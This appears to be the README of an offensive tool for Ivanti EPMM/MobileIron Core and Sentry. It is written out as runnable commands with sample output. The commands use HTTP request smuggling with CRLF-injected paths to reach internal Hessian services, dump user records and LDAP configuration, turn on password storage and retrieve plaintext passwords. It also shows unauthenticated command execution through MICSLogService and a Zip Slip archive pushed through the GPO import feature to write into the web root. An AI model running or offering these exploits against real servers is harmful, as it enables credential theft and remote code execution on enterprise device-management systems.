More details in :
- Ivanti EPMM / MobileIron Core - Multiple Vulnerabilities
- Ivanti Sentry / MobileIron Sentry - Unauthenticated Remote Code Execution
- Multiple interesting methods on Hessian service can be called
Usage: mi_desync.py [OPTIONS] COMMAND [ARGS]...
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ --help Show this message and exit. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ General options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ * -t TEXT The target URL [default: None] [required] │
│ -x TEXT HTTP proxy [default: (None)] │
│ -A TEXT User-Agent [default: Mozilla/5.0] │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ findLdapUsers │
│ getAllUsers Dump Users │
│ getLDAPConfigs Dump the LDAP configuration │
│ getSettings Get multiple settings by ID (e.g 28,409) │
│ getSettingsByProperty e.g saveUserPassword,enterpriseName │
│ retrieveUserPassword Retrieve plaintext password of a user │
│ setSaveUserPassword Multiple settings by property (e.g saveUserPassword,feature.flag.secret ) │
│ storeUserPassword Change password of a user │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯- Dump all users
$ mi_desync.py -t https://micore.local getAllUsers | jq '.[] | {principal, email, passcode}'
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService...
[+] Got Hessian reply with object of type UserServiceResultDTO
{
"id": 9000,
"principal": "misystem",
"email": null,
"passcode": null,
"userSource": "L"
}
{
"id": 9001,
"principal": "admin",
"email": null,
"passcode": "V2;KyC4Z/jQI4zL0InyCtWZ2g==;F24/vblg/tAaIpwtbY5+PQ==",
"userSource": "L"
}
[...]- Enable the
saveUserPasswordsetting
$ mi_desync.py -t https://micore.local setSaveUserPassword 1
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type MISettingsResultDTO
[]
$ mi_desync.py -t https://micore.local getSettingsByProperty saveUserPassword
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type tuple
[
[
{
"miSettingId": 28,
"property": "saveUserPassword",
"value": "1",
"uuid": null,
"id": null,
"principal": null,
"deviceSpaceId": 1,
"deviceSpacePath": "/1/",
"modifiedAt": "11/01/2023, 01:01:01"
}
]
]- Retrieve a user's password
$ mi_desync.py -t https://micore.local retrieveUserPassword ayrton
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type str
["SuperSecureADPassword123"]- Call the
uploadFileUsingFileInputmethod inMICSLogServiceto execute commands
$ curl -sk -H 'Content-Type: application/x-hessian' 'https://sentry1.local:8443/mics/services/MICSLogService' -v --data-binary @<(echo $(./mi_sentry_micslogservice.py "<CMD_LINE>") | base64 -d) 2>&1 " --output -
HRH isRunningTZ- Use
genZip.javato craft Zip Slip archives
$ mkdir zipit
$ echo 1 > zipit/test.txt
$ javac genZip.java && java genZip
$ base64 -d genZip.out > payload.zip
$ unzip -l payload.zip
Archive: payload.zip
Length Date Time Name
--------- ---------- ----- ----
1 2023-08-01 10:16 ../../../../mi/tomcat/webapps/mifs/text.txt- Exploit the GPO import feature
$ curl -k https://micore.local/mifs/rest/api/v2/component/gpo/import -u 'admin:***' -H 'Referer: http://micore.local/' -F admxZipPackage=@zipslip/mi_zip/payload.zip
{"errors":null,"result":"Admx package successfully ingested","success":true}